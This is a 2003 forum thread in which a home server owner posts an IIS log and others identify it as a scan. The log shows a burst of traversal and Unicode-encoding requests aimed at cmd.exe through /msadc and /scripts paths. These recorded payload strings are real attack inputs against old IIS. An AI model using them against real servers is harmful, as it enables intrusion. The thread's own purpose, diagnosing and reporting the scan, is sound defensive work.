what to make of this...LONG POST

[CaterpillarAssassin]

I have a small FTP/Web server. I was looking through the FTP logs when I found some MP3's in a shared folder that were not mine. Well heres the logs...


!!!HTTP LOG!!!

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-02-03 04:06:44
#Fields: time c-ip cs-method cs-uri-stem sc-status
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /links.phtml 404
04:06:44 127.0.0.1 GET /image-384476-1054757 404
04:12:15 12.212.218.114 GET /images/desktop.jpg 200
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /links.phtml 404
04:14:45 127.0.0.1 GET /image-384476-1054757 404
04:34:31 192.168.0.112 OPTIONS / 200
04:34:31 192.168.0.112 PROPFIND /e 501
07:17:35 192.168.0.112 OPTIONS / 200
07:17:35 192.168.0.112 PROPFIND /e 501
07:31:17 192.168.0.112 OPTIONS / 200
07:31:17 192.168.0.112 PROPFIND /c 501
07:46:26 192.168.0.112 OPTIONS / 200
07:46:26 192.168.0.112 PROPFIND /e 501
08:08:23 192.168.0.112 OPTIONS / 200
08:10:09 192.168.0.112 OPTIONS / 200
08:12:03 192.168.0.112 OPTIONS / 200
08:13:06 209.122.110.241 HEAD /Default.htm 200
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á%8s../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..À%9v../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /msadc/..À%qf../winnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
08:13:11 209.122.110.241 GET /msadc/..o../winnt/system32/cmd.exe 404
08:13:11 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c..\winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/....../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..%\..%\winnt/system32/cmd.exe 500
08:13:12 209.122.110.241 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /msadc/..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:12 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/..À/..À/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..Á..Á..Á../winnt/system32/cmd.exe 500
08:13:14 209.122.110.241 GET /msadc/.._../.._../.._../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..o../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:14 209.122.110.241 GET /msadc/.._../winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/check.bat/..À/..À/..À/winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /msadc/check.bat/..Á..Á..Áwinnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:15 209.122.110.241 GET /msadc/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..Á%pc../winnt/system32/cmd.exe 500
08:13:15 209.122.110.241 GET /msadc/..o../..o../..o../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..Á%pc../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /msadc/..ð€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..Á%8s../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:17 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..À%qf../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:17 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..Á../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /scripts/..À%9v../winnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:18 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /msadc/..ð€€¯../winnt/system32/cmd.exe 404
08:13:18 209.122.110.241 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..o../..o../..o../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..o../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..Á%pc../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%\..%\winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..%5c..\winnt/system32/cmd.exe 500
08:13:19 209.122.110.241 GET /scripts/..ð€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/....../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /script/winnt/system32/cmd.exe 404
08:13:19 209.122.110.241 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /script/..Á../..Á../..Á../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /script/.._../.._../.._../winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..%5c../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..Á%8s../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..À%qf../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/..À%9v../winnt/system32/cmd.exe 500
08:13:20 209.122.110.241 GET /scripts/winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:13:20 209.122.110.241 GET /winnt/system32/cmd.exe 404
08:15:15 192.168.0.112 OPTIONS / 200
08:15:15 192.168.0.112 PROPFIND /e 501
12:34:04 80.196.111.238 GET /sumthin 404
17:55:07 127.0.0.1 GET /links.phtml 404
18:03:35 127.0.0.1 GET /ads/MSNHPB/00292MO0286_S4.gif 404
18:03:35 127.0.0.1 GET /ads/MSNBFP/00292T40136_D2.gif 404
18:07:36 192.168.0.112 OPTIONS / 200
18:07:36 192.168.0.112 PROPFIND /e 501
21:54:05 192.168.0.112 OPTIONS / 200
21:54:05 192.168.0.112 PROPFIND /e 501
21:59:22 192.168.0.112 OPTIONS / 200
21:59:22 192.168.0.112 PROPFIND /c 501

!!!END LOG!!!


Is this someone trying to hack? Trying to get CMD.EXE is a no no...any ideas here?

[PreDatoR]

ya you were getting hacked... IIS man you should know better than to use that shit...

[matt719]

i wonder if he had an IP cloak

[CaterpillarAssassin]

well judging by all the 500 errors and 404's he didnt get far. So I guess IIS isnt that bad now is it?

[PreDatoR]

LOL ya if you've updated all of Winblowz then for the time being it ain't bad... anyone who runs IIS on a 2k or XP box that don't need it running gets what they deserve if they get hacked.. most people run it justfor a FTP when there's progs out there thatdo things so much better and easier...and SAFER!

[CaterpillarAssassin]

tracert'd that IP and came back with avtivedom49.erols.com. Put the IP into my browser and came up with a starter page for IIS. hmmm......wonder if there morons, or if he spoofed his IP. IDK. I blocked the IP on my firewall anyways.

[PreDatoR]

anyone with half a brain would be going through anonymous proxy's to hack anyways... so i highly doubt its their ip addy...

[BillyGoat]

yep scanning for openings in iis


Registrant:
Erol's Internet Service (EROLS-DOM)
7921 Woodruff Court
Springfield
VA,22151
US

Domain Name: EROLS.COM

Administrative Contact:
RCN Terms of Service (ETS3-ORG) abuse@RCN.COM
RCN
7921 Woodruff Court
Springfield, VA 22151
US
703-321-8000
Fax- 703-321-8316
Technical Contact:
RCN (EROLS-NOC) domreg@RCN.COM
RCN
1 Federal St
Springfield, MA 01105
US
(609) 734-3700 fax: 609-919-8574

Record expires on 01-May-2011.
Record created on 30-Apr-1995.
Database last updated on 4-Feb-2003 02:13:27 EST.

Domain servers in listed order:

AUTH1.DNS.RCN.NET 207.172.3.20
AUTH3.DNS.RCN.NET 207.172.3.21
AUTH2.DNS.RCN.NET 207.172.3.20

you should contact them, they should be able to check there logs and do something about it, i dought it was spoofed script kiddies arent that brilliant these days but who knows

[CaterpillarAssassin]

thanks alot for the info billygoat. I'll probably shoot them an email tomorrow. it is sleepy time now....

[DoPeY5007]

I get that with Apache as well...



I send net sends to the IP address that try's to hack me :-p

[CaterpillarAssassin]

excellent idea dopey

[CaterpillarAssassin]

dammit there machine is off! I'll be checking back later today though